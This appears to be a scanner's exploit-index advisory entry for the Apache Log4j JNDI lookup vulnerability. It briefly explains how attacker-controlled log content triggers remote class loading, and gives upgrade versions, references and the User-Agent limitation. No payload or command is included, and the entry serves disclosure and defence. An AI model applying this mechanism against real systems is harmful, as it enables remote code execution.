Apache Log4j JNDI message lookup vulnerability
Added: 12/16/2021Background
Apache Log4j is a logging library used by many Java applications.Problem
An attacker who is able to control log message content could embed a JNDI reference to an LDAP or RMI URL which downloads an executable Java class, leading to arbitrary command execution.Resolution
Upgrade to Apache Log4j 2.12.2 or 2.16 or higher, or apply a fix from the vendor of the software which embeds Log4j.References
https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidancehttps://logging.apache.org/log4j/2.x/security.html
https://isc.sans.edu/diary/28120
Limitations
Exploit works on web applications which use Log4j to log the User-Agent header.Platforms
WindowsLinux
Back to exploit index